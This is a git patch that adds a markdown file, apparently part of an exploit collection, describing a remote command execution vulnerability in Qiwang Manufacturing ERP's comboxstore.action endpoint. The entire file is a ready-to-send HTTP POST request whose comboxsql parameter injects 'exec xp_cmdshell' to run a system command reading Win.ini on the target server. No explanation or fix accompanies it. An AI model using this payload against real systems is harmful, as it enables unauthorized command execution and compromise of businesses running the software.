From 95aa39046e187ef2be4ddeba3e37b89d640ddde6 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 20 Aug 2023 09:33:11 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E4=BC=81=E6=9C=9B=E5=88=B6=E9=80=A0?= =?UTF-8?q?=20ERP=20comboxstore.action=20=E8=BF=9C=E7=A8=8B=E5=91=BD?= =?UTF-8?q?=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 企望制造 ERP comboxstore.action 远程命令执行漏洞.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 企望制造 ERP comboxstore.action 远程命令执行漏洞.md diff --git a/企望制造 ERP comboxstore.action 远程命令执行漏洞.md b/企望制造 ERP comboxstore.action 远程命令执行漏洞.md new file mode 100644 index 0000000..9326794 --- /dev/null +++ b/企望制造 ERP comboxstore.action 远程命令执行漏洞.md @@ -0,0 +1,9 @@ +## 企望制造 ERP comboxstore.action 远程命令执行漏洞 +``` + +POST /mainFunctions/comboxstore.action HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +Host: xxx.xxx.xxx.xxx + +comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini' +```